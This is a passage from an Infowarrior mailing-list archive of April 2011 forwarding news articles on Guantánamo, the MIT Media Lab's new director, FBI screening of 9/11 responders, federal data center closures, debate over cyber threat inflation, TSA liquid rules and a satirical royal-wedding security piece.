officials have refused to increase the inmate population. As a result, Guant?namo seems increasingly frozen in time, with detainees locked into their roles at the receding moment of their capture. For example, an assessment of a former top Taliban official said he ?appears to be resentful of being apprehended while he claimed he was working for the US and Coalition forces to find Mullah Omar,? a reference to Mullah Muhammad Omar, the Taliban chief who is in hiding. But whatever the truth about the detainee?s role before his capture in 2002, it is receding into the past. So, presumably, is the value of whatever information he possesses. Still, his jailers have continued to press him for answers. His assessment of January 2008 ? six years after he arrived in Cuba ? contended that it was worthwhile to continue to interrogate him, in part because he might know about Mullah Omar?s ?possible whereabouts.? Charlie Savage reported from Washington, and William Glaberson and Andrew W. Lehren from New York. Scott Shane contributed reporting from Washington, and Benjamin Weiser and Andrei Scheinkman from New York. From rforno at infowarrior.org Mon Apr 25 20:34:08 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 21:34:08 -0400 Subject: [Infowarrior] - M.I.T. Media Lab Names a New Director Message-ID: M.I.T. Media Lab Names a New Director By JOHN MARKOFF http://www.nytimes.com/2011/04/26/science/26lab.html?pagewanted=print For centuries diplomas have been synonymous with the nation?s universities. That makes the Massachusetts Institute of Technology?s decision to name a 44-year old Japanese venture capitalist who attended, but did not graduate, from two American colleges as the director of one of the world?s top computing science laboratories an unusual choice. On Tuesday, the university plans to announce that Joichi Ito, known as Joi, will become the fourth director of the M.I.T. Media Laboratory, which was originally founded by the architect Nicholas Negroponte in 1985 and has since become recognized for its willingness to take risks in developing technologies that are at the edge of the computing frontier. The Media Laboratory gained a global reputation during the 1990s as an avant-garde research center known for stunning high-technology demonstrations that pointed toward a future digital society. Indeed, the Media Lab has on occasion been criticized for overemphasizing flashy demos. During the 1990s, under Dr. Negroponte, the lab evolved a research culture of ?demo or die,? rather than the standard academic ?publish or perish? model. The Media Lab pioneered a range of computing-based technologies like the Aspen Movie Map, a forerunner of Google Street View, the $100 Laptop, an educational tool intend for students in the developing world, and E Ink, the display technology that makes an Amazon Kindle book reader viewable in bright sunlight. Perhaps its most important role, however, has been in helping to nurture a generation of innovative designers like John Underkoffler, a user-interface designer who is now a Hollywood consultant and who provided most of the futuristic interface ideas seen in the movie ?Minority Report.? In 1990, with American fears about Japan as a high-technology competitor running high, the Media Lab also briefly became a lightning rod for criticism after it struck a deal to transfer its research approach to Japanese industry and educational institutions. Although that adds a touch of irony to the decision to choose Mr. Ito, he is neither a conventional Japanese technologist, nor your average college dropout. Raised in both Tokyo and Silicon Valley, Mr. Ito was part of the first generation to grow up with the Internet. His career includes serving as a board member of Icann, the Internet?s governance organization; becoming a ?guild master? in the World of Warcraft online fantasy game; and more than a dozen investments in start-ups like Flickr, Last.fm and Twitter. In 1994 he helped establish the first commercial Internet service provider in Japan. He was also an early participant in the open-source software movement and is a board member of the Mozilla Foundation, which oversees the development of the Firefox Web browse, as well as being the co-founder and chairman of Creative Commons, a nonprofit organization that has sought to create a middle ground to promote the sharing of digital information. ?The choice is radical, but brilliant,? said Larry Smarr, director of the California Institute for Telecommunications and Information Technology, a University of California laboratory that pursues a similar research agenda to the Media Laboratory. ?He can position the lab at the edge of change and propel it for a decade.? Mr. Ito?s appointment comes at a time when the Media Lab, as well as other information technology research centers, have struggled to reclaim the financing levels that were characteristic of the era of the dot-com boom. Although the lab gets the bulk of its $35 million annual budget from corporate and government sponsors, that amount has declined measurably as a percentage of the overall budget during the last decade, Dr. Negroponte said. ?Funding got tight in 2002 and even tighter in the last economic downturn,? he said. That has made fund-raising the highest priority for the new director, he said. However, he added that Mr. Ito?s particular leadership qualities made him stand out among the 250 candidates who were considered for the position. ?Joi is very good at enabling others,? he said. ?I?ve never met a 44-year-old who is able to enable others in this way. Most people who are at that age are into themselves and their career.? L. Rafael Reif, the provost of M.I.T., called Mr. Ito ?the right person to lead the Media Lab today,? describing him as ?an innovative thinker who understands the tremendous potential of technology and, in particular, the Internet, to influence education, business, and society in general.? Directing the Media Lab is an alluring challenge because of the potential of blending the longer term focus of university research and development efforts with the agility and risk-taking approach of Silicon Valley start-ups, Mr. Ito said. ?You embrace serendipity and you pivot as you go along this longer term arc. That?s the way I have lived my life. I?ve jumped around in terms of career and geography,? he said. Mr. Ito, who maintains a home outside of Tokyo, became a resident of Dubai at the end of 2008 to gain a better understanding of the Middle East. He said that was part of his desire to understand intellectual property issues internationally and to become what he described as a ?global citizen.? Even among the Internet generation, Mr. Ito has been extraordinary in the degree to which he has lived his life publicly and online in blog posts and on a dizzying array of social media. Last year he traveled about 230 days, and it is possible to follow his adventures on a Web site he maintains in text, images and video including a diving trip this month that involved feeding sharks in the Caribbean. Mr. Ito first attended Tufts where he briefly studied computer science but wrote that he found it drudge work. Later he attended the University of Chicago where he studied physics, but once again found it stultifying. He later wrote of his experience: ?I once asked a professor to explain the solution to a problem so I could understand it more intuitively. He said, ?You can?t understand it intuitively. Just learn the formula so you?ll get the right answer.? That was it for me.? Mr. Ito?s colleagues minimize the fact that he is without academic credentials. ?He has credibility in an academic context,? said Lawrence Lessig, a professor at Harvard Law School who co-founded Creative Commons. Mr. Ito is currently chairman. ?We?ve been collaborators, and I?ve stolen many ideas from him and turned them into my own.? The Media Lab will benefit from a director who has Mr. Ito?s global connections, said John Seely Brown, former director of Xerox?s Palo Alto Research Center. ?What they really need right now is to have a two-way connection to the outside world. Who more to do that than Joi?? From rforno at infowarrior.org Tue Apr 26 19:45:57 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 26 Apr 2011 20:45:57 -0400 Subject: [Infowarrior] - CRS Report Withheld By USTR Confirms That ACTA Language Is Quite Questionable Message-ID: CRS Report Withheld By USTR Confirms That ACTA Language Is Quite Questionable from the revealed dept We're happy to announce that we've been able to get our hands on the -- until now -- secret Congressional Research Service analysis of ACTA. You can see it embedded below, and it shows that the language used by the USTR in ACTA has lots of weasel words that let them claim it doesn't impact US law, but the interpretations of the language could very much impact US law. First some background.... < -- > http://www.techdirt.com/articles/20110421/16580813994/crs-report-withheld-ustr-confirms-that-acta-language-is-quite-questionable.shtml From rforno at infowarrior.org Wed Apr 27 06:16:35 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 07:16:35 -0400 Subject: [Infowarrior] - 9/11 Responders To Be Warned They Will Be Screened By FBI's Terrorism Watch List Message-ID: 9/11 Responders To Be Warned They Will Be Screened By FBI's Terrorism Watch List (EXCLUSIVE) First Posted: 04/21/11 04:24 PM ET Updated: 04/21/11 10:56 PM ET http://www.huffingtonpost.com/2011/04/21/911-responders-screened-for-terror-ties_n_852198.html WASHINGTON -- A provision in the new 9/11 health bill may be adding insult to injury for people who fell sick after their service in the aftermath of the 2001 Al Qaeda attacks, The Huffington Post has learned. The tens of thousands of cops, firefighters, construction workers and others who survived the worst terrorist assault in U.S. history and risked their lives in its wake will soon be informed that their names must be run through the FBI?s terrorism watch list, according to a letter obtained by HuffPost. Any of the responders who are not compared to the database of suspected terrorists would be barred from getting treatment for the numerous, worsening ailments that the James Zadroga 9/11 Health And Compensation Law was passed to address. It?s a requirement that was tacked onto the law during the bitter debates over it last year. The letter from Dr. John Howard, director of the National Institute for Occupational Safety and Health, informs medical providers and administrators that they should begin letting patients know before the new program kicks in this July. ?This is absurd,? said Glen Kline, a former NYPD emergency services officer. ?It?s silly. It?s stupid. It?s asinine.? ?It?s comical at best, and I think it?s an insult to everyone who worked on The Pile and is sick and suffering from 9/11,? said John Feal, a former construction worker who lost half a foot at Ground Zero and runs the advocacy group Fealgood Foundation. The provision was added in an amendment by Rep. Cliff Stearns (R-Fla.) during the heated debate over the bill in the House Energy and Commerce Committee last May. Sept. 11 responders in the committee room at the time mostly shook their heads at the move, which Democrats accepted on a voice vote after battling to bar other amendments on abortion and immigration that might have killed the bill. But suddenly the point is no longer just a strategic concession to get a law passed. As doctors and administrators begin acting on the federal instructions, participants in the 9/11 treatment and monitoring programs will soon be told that their names, places of birth, addresses, government ID numbers and other personal data will be provided to the FBI to ensure they are not terrorists. Howard's instructions include a sample letter to responders designed to minimize alarm. ?Although neither we nor [the Centers for Disease Control]/NIOSH anticipate the name of any individual in the current Programs will be on the list, CDC/NIOSH is expressly required by law to implement this particular requirement of the Act,? it says. ?Thank you for your understanding. We look forward to working with you and ensuring that you continue to receive uninterrupted services under the new WTC Health Program,? it concludes. Feal, who counts hundreds of first responders in his foundation's membership, predicted the letters would not go over well. ?When cops and firefighters get this at home, they?re going to hit the roof,? he said. Kline, who sits on the Fealgood Foundation?s board, said he personally wasn?t offended, but couldn?t think of a good reason for cops and firefighters to be screened by the FBI in order to keep getting treatment. ?I mean, who are we even talking about -- the undocumented workers who cleaned the office buildings?? wondered Kline Thursday. ?We know who all the cops, firefighters and construction workers were. They?re all documented. ?Is the idea that a terrorist stayed to help clean up? And then stayed all these years to try and get benefits?? he asked. ?In all the things I?ve seen out of Washington, this probably takes the cake.? Some are more understanding. ?Do we want terrorists getting money? No,? said Anthony Flammia, a former NYPD Highway Patrol officer and Sept. 11 responder. ?How do you know if there were any terrorists there? Were they there as observers, watching? Probably.? But he noted that his perspective likely would not be shared, especially if people whose names are similar to actual terror suspects get flagged, as happens with air travelers. ?I?ve got nothing to hide, so it?s no big deal for me, but there?s got to be safeguards in place to protect the people who are innocent,? Flammia said. ?It?s going to be controversial,? he added. ?It?s probably going to create an uproar, but I think it will dissipate. I hope they're ready to answer people's questions.? Congressman Stearns said in a statement that his intent was to answer exactly the questions raised by Flammia. ?This amendment was adopted in the full Energy and Commerce Committee without opposition and it merely requires that the names of those receiving health benefits be cross-checked with the terrorist watch list to ensure that no terrorists get these benefits,? Stearns said. ?These benefits are not just for our first responders; nearly anyone who was in the vicinity or worked on a cleanup crew afterward is eligible,? he noted. The prohibition is included in two parts of the bill. One specifically covers responders, while the other deals with all survivors, including office workers, bystanders and residents. Feal acknowledged that the terrorist screening has to be done because it is the law, and that the letters have to go out. But he holds Stearns responsible, as well as several other Republicans who were hostile to the 9/11 bill, and tried to tack all manner of amendments onto it. ?I think Congressman Stearns is stabbing at pettiness. He?s a buffoon,? Feal said. ?We get sicker and die, and they?re going to disseminate a letter wondering whether we?re terrorists or not. ... I think everybody needs to start showing a little more compassion.? From rforno at infowarrior.org Wed Apr 27 06:28:25 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 07:28:25 -0400 Subject: [Infowarrior] - Government to Pull Plug on 137 Data Centers Message-ID: Government to Pull Plug on 137 Data Centers By DAMIAN PALETTA http://online.wsj.com/article/SB10001424052748704729304576287431386089352.html The Obama administration will unveil plans Wednesday to shut 137 of the 2,094 federal data centers by the end of the year, a move that officials see as a breakthrough in their effort to make the government's information-technology infrastructure more efficient and less costly. The closures would affect 16 federal agencies, including the Pentagon and the State Department, in nearly every corner of the U.S., from Boston to Anchorage, Alaska, according to the White House plan. Administration officials said that they didn't have an estimate of how many government and contractor jobs might be cut as a result. The number of federal data centers has grown rapidly in recent decades, up from just 432 in 1998. But White House officials said many of the centers ran over budget and were underutilized. The Obama administration began planning to pare back data centers in February 2009, soon after President Barack Obama took office. The process proved complicated because it took months for officials to determine how many even existed. The plan aims to close a total of 800 centers by 2015, which officials project would save $3 billion annually. The proliferation of facilities was the target of a Government Accountability Office report in March, which described them as a prime example of duplication and overlap in federal bureaucracy. "Projects run over budget, they fall behind schedule, and they fail to deliver their promised functionality," said Jeffrey Zients, the White House's chief performance officer. "That's clearly unacceptable." Data centers facilitate computer processing; they can be used for data storage, networking or housing servers. White House officials believe the number of facilities, spread out across many different agencies, is inefficient. The government spends roughly $450 million on electricity for the centers, and White House officials estimate that 27% of a typical data center is utilized, far lower than averages for private-sector counterparts. Consolidating data centers is part of the White House's broader effort to reduce the growth of government and spending, something critics have said the administration hasn't moved quickly enough to address. The government spends roughly $80 billion a year on information technology, just a fraction of overall federal spending, but officials believe roughly $24 billion of that amount is spent on data centers and their operations. Many White House proposals to reduce the deficit, such as an overhaul of the tax code or eliminating certain Pentagon projects, require congressional approval. But the executive branch has more direct influence in the operations of federal agencies, making it easier to carry out the data-center consolidation. Still, such a move could face political resistance from lawmakers seeking to protect jobs at data centers in their districts. "We do expect, obviously, in the coming months and years to make some of those really tough decisions where we would have to work really close with Congress to shut down data centers that frankly don't make sense," said Vivek Kundra, the government's chief information officer. The administration has already shut 39 of them, with 98 more to be closed by year's end. Before the reductions began, the Pentagon had 772 data centers, far more than any other agency, according to the government. Of the total closures, 57 will be within the Defense Department, 18 in the Department of the Interior and 14 in the National Aeronautics and Space Administration. Write to Damian Paletta at damian.paletta at wsj.com From rforno at infowarrior.org Wed Apr 27 08:06:19 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 09:06:19 -0400 Subject: [Infowarrior] - Petraeus and Panetta in Line for National Security Posts Message-ID: Petraeus and Panetta in Line for National Security Posts By ELISABETH BUMILLER and MARK MAZZETTI https://www.nytimes.com/2011/04/28/us/28team.html?pagewanted=print WASHINGTON ? President Obama is expected this week to name Leon E. Panetta, the director of central intelligence, as defense secretary and Gen. David H. Petraeus, the top American commander in Afghanistan, as director of the C.I.A., administration officials said Wednesday. The appointments, set in motion by the impending retirement of Defense Secretary Robert M. Gates, are part of a significant rearrangement of Mr. Obama?s national security team that will include several new assignments within the closest circle of his diplomatic, military and intelligence advisors. Mr. Gates is expected to step down this summer. The changes at the top of Mr. Obama?s national security team have long been expected. Not long after Mr. Gates leaves, the term will expire for the chairman of the Joint Chiefs of Staff, Adm. Mike Mullen, who, like the defense secretary, was appointed by President George W. Bush. And Deputy Secretary of State James B. Steinberg has announced that he is leaving for an academic job ? removing one of the crucial players in Mr. Obama?s efforts to manage China?s rise. But Mr. Gates?s role is the most critical. He often allied with Secretary of State Hillary Rodham Clinton ? who has said that she intends to leave the administration when this term ends ? including persuading Mr. Obama to start the military buildup in Afghanistan in 2009. Together they won many other battles, but they visibly split last month on the military intervention in Libya. In naming Mr. Panetta to the Pentagon, Mr. Obama is selecting an already confirmed cabinet official with strong ties to both the White House and Capitol Hill. In selecting General Petraeus, who at least initially did not have a strong relationship with the Obama White House, the president is retaining a high-profile military official who has extensive knowledge of intelligence gathering in both Afghanistan and Iraq in recent years. From rforno at infowarrior.org Wed Apr 27 09:05:02 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 27 Apr 2011 10:05:02 -0400 Subject: [Infowarrior] - GMU Paper: The Dangers of Threat Inflation in Cybersecurity Policy Message-ID: <5AB93AB4-2F5E-4D30-B517-FF0F28AC4F20@infowarrior.org> Loving the Cyber Bomb? The Dangers of Threat Inflation in Cybersecurity Policy Jerry Brito, Tate Watkins | Apr 26, 2011 http://mercatus.org/publication/loving-cyber-bomb-dangers-threat-inflation-cybersecurity-policy Over the past two years there has been a steady drumbeat of alarmist rhetoric coming out of Washington about potential catastrophic cyber threats. For example, at a Senate Armed Services Committee hearing last year, Chairman Carl Levin said that ?cyberweapons and cyberattacks potentially can be devastating, approaching weapons of mass destruction in their effects.? Proposed responses include increased federal spending on cybersecurity and the regulation of private network security practices. The rhetoric of ?cyber doom? employed by proponents of increased federal intervention, however, lacks clear evidence of a serious threat that can be verified by the public. As a result, the United States may be witnessing a bout of threat inflation similar to that seen in the run-up to the Iraq War. Additionally, a cyber-industrial complex is emerging, much like the military-industrial complex of the Cold War. This complex may serve to not only supply cybersecurity solutions to the federal government, but to drum up demand for them as well. Part I of this article draws a parallel between today?s cybersecurity debate and the run-up to the Iraq War and looks at how an inflated public conception of the threat we face may lead to unnecessary regulation of the Internet. Part II draws a parallel between the emerging cybersecurity establishment and the military-industrial complex of the Cold War and looks at how unwarranted external influence can lead to unnecessary federal spending. Finally, Part III surveys several federal cybersecurity proposals and presents a framework for analyzing the cybersecurity threat. < -- > http://mercatus.org/publication/loving-cyber-bomb-dangers-threat-inflation-cybersecurity-policy From rforno at infowarrior.org Thu Apr 28 06:01:08 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 07:01:08 -0400 Subject: [Infowarrior] - Cyberespionage: US finds FBI agents in elite unit lack necessary skills Message-ID: <1E72B0AF-F4C1-4179-B32F-B88467EA5C17@infowarrior.org> The Christian Science Monitor - CSMonitor.com Cyberespionage: US finds FBI agents in elite unit lack necessary skills With US increasingly vulnerable to cyberespionage, a Justice Department report finds that many agents attached to the FBI's elite cyber unit lack the skills to investigate such cases. http://www.csmonitor.com/layout/set/print/content/view/print/380037 By Mark Clayton, Staff writer posted April 27, 2011 at 8:41 pm EDT Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone ? a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions ? those by a foreign power for intelligence gathering or terrorist purposes. MONITOR QUIZ: How much do you know about cybersecurity? But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, ?reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases.? Five of the agents told investigators ?they did not think they were able or qualified? to investigate such cases, the report said. The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI?s cyber unit. Still, having enough highly qualified digital experts defending US government and other computer systems is neither an unknown problem nor one exclusive to the FBI. More experts are needed ?While billions of dollars are being spent on new technologies to secure the US government in cyberspace, it is the people with the right knowledge, skills, and abilities to implement those technologies who will determine success,? the cyber education section of President Obama's Comprehensive National Cybersecurity Initiative found last year. ?However there are not enough cybersecurity experts within the federal government or private sector? to secure the government. Existing training and education programs, it said, are ?limited in focus and lack unity of effort.? To ensure an adequate pipeline of skilled people ?it will take a national strategy, similar to the effort to upgrade science and mathematics education in the 1950s, to meet this challenge.? Other cybersecurity experts have cited the same problem. ?There are about 1,000 security people in the US who have the specialized security skills to operate at world-class levels in cyberspace ? we need 10,000 to 30,000,? Jim Gosler, founding director of the CIA's Clandestine Information Technology Office, was quoted as saying in a report last year by the Center for Strategic and International Studies in Washington. Agent rotation is criticized Among the issues that impeded developing strong expertise and solving cyber investigations was the practice of rotating field agents to a new field office every three years, the inspector general said. After rotating to a new office, an agent with cyber investigation experience often is not assigned to a cyber unit ?leaving their cyber background underutilized.? ?When a foreign country uses computer networks to attack a cleared-defense contractor in Memphis, it uses the same technology and techniques? as an attack on a defense contractor in New York, the inspector general's report said. The FBI cybersquads were also not as effective as they could be because the squads did not always have intelligence analysts embedded in their units to provide a strategic perspective and overall threat analysis, the inspector general found. The FBI also ?needs to make also failed to share information better with other agencies in the joint task force,? the report said. In its written response to the critical report, FBI associated deputy director T.J. Harrington concurred with 10 recommendations in the report and noted that the bureau had met 20 of 22 mandates outlined in the president's Comprehensive National Cybersecurity Initiative. The bureau also outlined a number of other steps it is taking to cultivate cyber expertise said it is also considering ?developing regional hubs with agents expert in investigating national security intrusions.? From rforno at infowarrior.org Thu Apr 28 06:02:29 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 07:02:29 -0400 Subject: [Infowarrior] - Are we talking "cyber war" like the Bush admin talked WMDs? Message-ID: <16CCEC12-375B-4117-A43E-848D8151A94C@infowarrior.org> Are we talking "cyber war" like the Bush admin talked WMDs? By Matthew Lasar | Last updated about 10 hours ago http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. As a consequence, the public is treated to a regular diet of draconian fare coming from Sixty Minutes and Fresh Air about the "growing cyberwar threat." Former National Security Adviser Richard A. Clarke suggests a thought exercise in his hit book Cyber War: imagine you are the assistant to the president for Homeland Security. The National Security Agency has just sent a critical alert to your BlackBerry: "Large scale movement of several different zero day malware programs moving on Internet in US, affecting critical infrastructure." As you get to your HQ, one of the DoD's main networks has already crashed; computer system failures have caused huge refinery fires around the country; the Federal Aviation Administration's air traffic control center in Virginia is collapsing, and that's just the beginning. "The Chairman of the Fed just called," the Secretary of the Treasury tells you. "Their data centers and their backups have had some sort of major disaster. They have lost all their data." Power blackouts are sweeping the country. Thousands of people have already died. "There is more going on," Clarke narrates, "but the people who should be reporting to you can't get through." This sort of scare-the-children prose has become something close to the norm, complain George Mason University Mercatus Center researchers Jerry Brito and Tate Wakins in a new working paper about what they see as the real problem?"threat inflation." "The rhetoric of 'cyber doom'," Brito and Watkins write, "lacks clear evidence of a serious threat that can be verified by the public. As a result, the United States may be witnessing a bout of threat inflation similar to that seen in the run-up to the Iraq War. Additionally, a cyber-industrial complex is emerging, much like the military-industrial complex of the Cold War. This complex may serve to not only supply cybersecurity solutions to the federal government, but to drum up demand for them as well." Our past experience The paper's title is "Loving the Cyber Bomb? The Dangers of Threat Inflation in Cybersecurity Policy." As that last paragraph suggests, these authors see a clear and present parallel between the cyberwar debate and the rhetoric of the Bush administration after September 11, 2001. First, the paper notes, the White House implied that Iraq's then dictator Sadaam Hussein had something to do with the attacks on New York City and the Pentagon. Then the government convinced influential newspapers like The New York Times to favorably quote administration leaks suggesting that Iraq possessed weapons of mass destruction. Both of these assertions were ultimately debunked, but the damage was done. As late as 2006, polls indicated that 40 percent of the US population still thought that Hussein was somehow in on 9/11. As with that story, "there is very little verifiable evidence" to back up the cyber threats claimed now, "and the most vocal proponents of a threat engage in rhetoric that can only be characterized as alarmist," Brito and Watkins write. "Cyber threat inflation parallels what we saw in the run-up to the Iraq War." Probed daily The paper is particularly hard on the report of the Commission on Cybersecurity for the 44th Presidency. Launched by the Center for Strategic and International Studies, it came complete with a distinguished panel of academics, consultants, IT industry biggies, and former government officials. What it didn't come with, the Mercatus study contends, was much evidence for the dire situation it posited?that the protection of cyberspace "is a battle we are losing." For example, the CSIS report warned that Department of Defense computers are "probed hundreds of thousands of times each day." But of course that's true, the paper notes. Probing and scanning are the norm in cyberspace, with software constantly trying the doors of websites and portals. Then the blue ribbon document contended that "porous information systems have allowed opponents to map our vulnerabilities and plan their attacks." Depriving Americans of electricity, communications, and financial services may not be enough to provide the margin of victory in a conflict, but it could damage our ability to respond and our will to resist. We should expect that exploiting vulnerabilities in cyber infrastructure will be part of any future conflict. Where, the Mercatus researchers ask, was the evidence that America's opponents have "mapped vulnerabilities" and "planned attacks"? These sort of reports often imply that they're working from classified sources. But: "If our past experience with threat inflation teaches us anything, it is that we cannot accept the word of government officials with access to classified information as the sole source of evidence for the existence or scope of a threat." Clarke and the present danger Richard Clarke's doomsday scenarios are next on the Mercatus paper's takedown list. Clarke's book cites the distributed denial of service attacks on Estonian and Georgian websites in 2007 and 2008 as particularly ominous. Obviously these assaults were serious and consequential, Brito and Wakins agree. But how do we get from botnet-infested computers or networks to the blackout, fire, and infrastructure collapse scenarios that Cyber War posits? We just don't, they insist, and they also take Clarke to task for citing the Brazil blackout of 2007 as another Exhibit A for future cyber eschatologies. The going thesis for a while was that the disaster was prompted by a criminal hacking. But subsequent probes of the crisis by the power company and its regulator concluded that dirt on high voltage insulators caused the outage. Ditto for the Northeast power blackout of 2003, suspected of being part of a worm-based cyberattack, found to be no such thing in a subsequent investigation. It's pretty obvious that these researchers deplore Clarke's book, especially speculations that the Russians "are probably saving their best cyber weapons for when they really need them, in a conflict in which NATO and the United States are involved." This sort of prose is "eerily reminiscent of the suggestion before the invasion of Iraq that although we lacked the type of evidence of WMD that might lead us to action, we would not want 'the smoking gun to be a mushroom cloud'," Brito and Watkins write. Cyber pork The Mercatus authors see very little good in this rhetoric, and many bad outcomes. They see unjustified regulation of the Internet as one possibility, and as Ars readers know, Congress has considered a bill that at one point would have given the president the authority to shut the 'Net down in the event of a cyberattack. They also see corporations ratcheting up the volume on the issue to bring in defense contracting dollars, and politicians joining the panic party to deliver federal money to their districts. But ultimately what they see is a scare mongering discourse that will make it impossible to realistically assess the cybersecurity situation. "Let us be very clear," their essay acknowledges: "although we are skeptical of the scope of the threat as presented by the proponents of regulation, we do not doubt that cyber threats do exist, nor would we suggest that regulation can never be appropriate. What we do propose is that before we rush to regulate cyberspace we should first demand verifiable evidence of the threat and its scope and, second, we should use any such evidence to conduct a proper analysis to determine whether regulation is necessary and if it will do more good than harm." From rforno at infowarrior.org Thu Apr 28 06:52:11 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 07:52:11 -0400 Subject: [Infowarrior] - FBI chasing down WoW gold farmers Message-ID: <100CED0D-39AB-49AE-AF6C-807F0553DA50@infowarrior.org> Yeah, okay .... that's definitely something they need to be working on right now. I'd say "Epic Fail" but we are talking about the Bureau after all. --- rick FBI Hunting Down World Of Warcraft Gold Farmers? from the that'll-keep-us-safe dept Just as the World Bank has put out an entire research report about the economics of virtual gold farmers (they claim it's a $3 billion plus industry, and has substantial impact on developing economies), it appears that the FBI is taking an interest in the practice as well. Just last month, the FBI apparently raided a Michigan home in search of virtual World of Warcraft gold. The university students who lived in the raided apartment claim that the FBI targeted the wrong place, and say that neither of them play World of Warcraft, but all of their computer equipment was seized. There aren't full details on the warrant, but the accusation suggests that there was some sort of virtual gold buying and selling fraud going on. I recognize these things can happen for quite a bit of money, but is this really the best use of the FBI's time? http://www.techdirt.com/articles/20110408/03292413827/fbi-hunting-down-world-warcraft-gold-farmers.shtml From rforno at infowarrior.org Thu Apr 28 06:53:42 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 07:53:42 -0400 Subject: [Infowarrior] - We've Trained The TSA To Search For Liquid Instead Of Bombs Message-ID: <562297FD-31ED-431E-B8D1-EDEA975D0743@infowarrior.org> We've Trained The TSA To Search For Liquid Instead Of Bombs from the feeling-safer-yet? dept http://www.techdirt.com/articles/20110427/01531214053/weve-trained-tsa-to-search-liquid-instead-bombs.shtml In the latest example of absolute insanity from the TSA and the way in which it conducts airport searches, "Patrick Smith," a pseudonymous pilot who writes about airline topics for Salon, tells the story of a ridiculous TSA encounter he had while flying as a passenger. It happened because Smith didn't put all his liquids into a ziploc plastic baggy, as required. He apparently never does this and rarely has problems (I've also found that I've never been stopped when I fail to produce the plastic baggy). However, this time he did. But it wasn't just that the TSA called him out for this, it was what happened after he obliged and put the liquids in a plastic bag: My carry-on goes through the scanner and comes out the other side. One of the guards squints at his monitor, then shoots me a hostile look. What's this, no plastic baggie? He pulls my luggage aside, opens it, and asks me to repack my liquids and gels "the right way." I do as he wants. When I'm finished, I hand him the baggie so he can run the items through again. To my surprise, he won't take them. "No," he says. "Just put them in your suitcase and go." But ... "Just put them in your suitcase and go." I look at him for a minute. Apparently my having to repack them was a punishment exercise? All right, fine. Lesson learned, I unzip the approved, one-quart zip-top bag, and begin to dump the containers back into my toiletries kit. "No!" interjects the guard. "Leave them in the plastic!" "Huh?" "You have to leave them in the plastic bag!" "But I'm already through the checkpoint. You already screened them." He shrugs. "They need to stay in the bag." "No they don't." "Yes they do." "Why?" "They need to stay in the bag. You should know better." Smith does a good job highlighting the absurdity of all of this and pointing out, of course, that the guard is wrong. But later in the post he really keys in on the scary point of all of this: we've trained the TSA to look for unbagged liquids, rather than explosives. And they're doing that successfully: Are we looking for liquids, or are we looking for explosives? A search for the former is not a de facto search for the latter. Not the way we've been doing it. Steve Elson tells the story of a test in which TSA screeners are presented with a suitcase containing a mock explosive device with a water bottle nestled next to it. They ferret out the water, of course, while the bomb goes sailing through. It's yet another case of where security theater is actually making us less safe. We've set up these rules that don't really help protect anyone, and yet the TSA folks are taught to follow the rules, rather than look for anyone actually looking to cause harm on an airplane. From rforno at infowarrior.org Thu Apr 28 07:56:47 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 28 Apr 2011 08:56:47 -0400 Subject: [Infowarrior] - VeryVeryVery OT: 'Operation Pumpkin' Message-ID: From a security planning perspective, this is just an amusing read. Not surprised to see such a contingency planned for, but it's still amusing to see it in print. --- rick Revealed: Secret security plan should Kate leave Wills at the altar http://www.theregister.co.uk/2011/04/28/operation_pumpkin/ 'Operation Pumpkin' prepped for royal runaway bride scenario By Marmaduke LaHussy, Reg royal correspondent ? Get more from this author Posted in Bootnotes, 28th April 2011 11:15 GMT Police and spooks in charge of security for tomorrow's royal wedding have planned for every possible eventuality - including that of Kate leaving Wills at the altar. The top-secret contingency plan for a "runaway bride" scenario has been dubbed "Operation Pumpkin", and if put into effect would see hundreds of operatives switch tasks in a desperate attempt to generate a moving security cordon around the escaping future Queen - while simultaneously attempting to preserve Prince William's option to pursue and dramatically win her back. "Frankly, it's a nightmare scenario," one highly-placed MI5 source confessed to the Reg yesterday. "But you have to plan for every possible contingency, and let's face it, this one's hardly that unlikely, is it? Obviously we had to get together with Clarence House and work something out. "Naturally, they wanted us to simply make her go through with it - but we said you must be joking: in the UK, in front of millions of witnesses? No way. And the plods would never play ball anyhow. "So we said, look, if she bottles it we'll just have to get her out pronto, helicopter off the roof maybe, then sort her out with a new identity and young Bill will just have to go on the honeymoon on his own." However our source said that royal officials were unhappy with that plan. They reluctantly accepted that Ms Middleton remains free to bolt right up until the last moment, but argued that she should be compelled to flee on foot for at least a short distance, so allowing the Prince to pursue her and so perhaps regain some PR benefit for the royal family - and maybe even persuade the absconding future consort to come up to scratch once more. "That's when it got difficult," says our source. "Now you've got her running out of the Abbey, crowds everywhere, him chasing after her. She's got to be able to run, he's got to be able to catch up if he can. Nightmare." After protracted, top-secret negotiations between royal staff from Clarence House and representatives from the Metropolitan Police, MI5 and elements of the military, a compromise was agreed. In the event of Operation Pumpkin being put into effect Ms Middleton will be permitted to run out of Westminster Abbey with her bodyguards trailing discreetly at a distance. Plain-clothes undercover police, MI5 officers and SAS soldiers stationed in the crowd will form 